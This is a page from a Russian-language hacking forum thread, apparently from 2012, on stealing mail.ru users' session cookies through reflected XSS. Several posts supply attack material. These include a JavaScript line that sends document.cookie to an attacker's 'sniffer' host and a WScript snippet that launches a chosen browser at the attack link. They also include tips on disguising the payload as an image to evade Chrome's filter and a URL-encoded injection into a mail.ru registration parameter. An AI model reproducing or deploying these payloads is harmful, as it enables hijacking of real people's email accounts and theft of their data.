HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Взлом mail.ru с помощью пассивной xss
   
Ответ
Страница 5 из 18 < 1 2 3 4 5 6 7 8 9 15 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.01.2012, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию
m744na
Учи javascript, дружок. Формируй сам код для атаки, используя location.href - как перенаправления, а setTimeout() для ожидания.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 30.01.2012, 01:00
m744na
Новичок
Регистрация: 29.03.2011
Сообщений: 1
С нами: 7959926

Репутация: 0
По умолчанию
Nick Hander,и на том спасибо (за наводочку))
 
Ответить с цитированием

  #3  
Старый 30.01.2012, 01:00
dryha_777
Новичок
Регистрация: 17.01.2012
Сообщений: 16
С нами: 7536566

Репутация: 0
По умолчанию
а как менять в мозиле то мне пришли кукри мозилы
 
Ответить с цитированием

  #4  
Старый 30.01.2012, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию
качайте видео отредактируйте файл xss.jpg измените ссылку на свой снифер

сам .js файл

PHP highlight

Код:

	
Код:

	
img= newImage();img.src="httpz://ссылка на снифер/s.gif?"+document.cookie;
 
Ответить с цитированием

  #5  
Старый 31.01.2012, 01:00
beknazar
Участник форума
Регистрация: 01.12.2010
Сообщений: 188
С нами: 8129846

Репутация: 8
По умолчанию
Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...
 
Ответить с цитированием

  #6  
Старый 31.01.2012, 01:00
beknazar
Участник форума
Регистрация: 01.12.2010
Сообщений: 188
С нами: 8129846

Репутация: 8
По умолчанию
Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.
 
Ответить с цитированием

  #7  
Старый 31.01.2012, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию
Цитата:

Сообщение от beknazar

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

наверно так и есть что ты вышел с этого мира тебе наверно лень скачать видео который я скинул ,там все показано как при помощи ифраме в картинке без всяких редиректов угнать кукисы,
а для хроме много вариантов пример этот вот скриптик

PHP highlight

Код:

	
Код:

	
varWshShell=WScript.CreateObject("WScript.Shell");
WshShell.Run("Chrome.exe httpz://На это влияет браузер? я думаю что нет");

то есть вместо Chrome.exe поставить можно так iexplore.ехе

если мы знаем точно что жертва пользуется хроме то запустится вместо Chrome.exe ---> iexplore.ехе
и кинет на ссылку ,в этом случае мы избегаем запуск самого хроме по умолчанию.

так же можно сделать и с оперой ,
если мы знаем что хроме стоит у жертвы по умолчанию.
 
Ответить с цитированием

  #8  
Старый 31.01.2012, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию
Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;

это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме
пример:

PHP highlight

Код:

	
Код:

	
http://w4.dwar.mail.ru/register.php?referrer=%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%3E%3Cdiv%20style=%22text-align:center;%22%3E%3Cimg%20src=%22http://www.htmlcodes.me/images/marquees/flying_bat.gif%22%20width=%22125%22%20height=%2282%22%20alt=%22Flying%20bat%20in%20a%20marquee%22%20/%3E%3Cbr%20/%3EBruce%20the%20Bat%3C/div%3E%3C/marquee%3E%3Cp%3E%3Ca%20style=%22font-size:11px;color:#999;" href="http://www.html.am/html-editors/online-html-editor.cfm">HTML editor0height="82"%20alt="Flying%20bat%20in%20a%20marquee"%20/>Bruce%20the%20BatHTML editorrquee>marquee>

теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif <--- на наш который будет в картинке ,если Вы оставите расширение .jsто куки не придут ,если дадите прямую ссылку на снифер то на снифер придет только адрес оттуда откуда Вы запустили яд.
 
Ответить с цитированием

  #9  
Старый 31.01.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию
Цитата:

Сообщение от beknazar

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

Конечно же ведь опера хорошо запасается всеми ресурсами да и страницы сохраняеет почти как оригинал.
 
Ответить с цитированием

  #10  
Старый 02.02.2012, 01:00
z.sty1e
Новичок
Регистрация: 23.12.2010
Сообщений: 15
С нами: 8098166

Репутация: 0
По умолчанию
уже не работает=\
 
Ответить с цитированием
Ответ
Страница 5 из 18 < 1 2 3 4 5 6 7 8 9 15 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.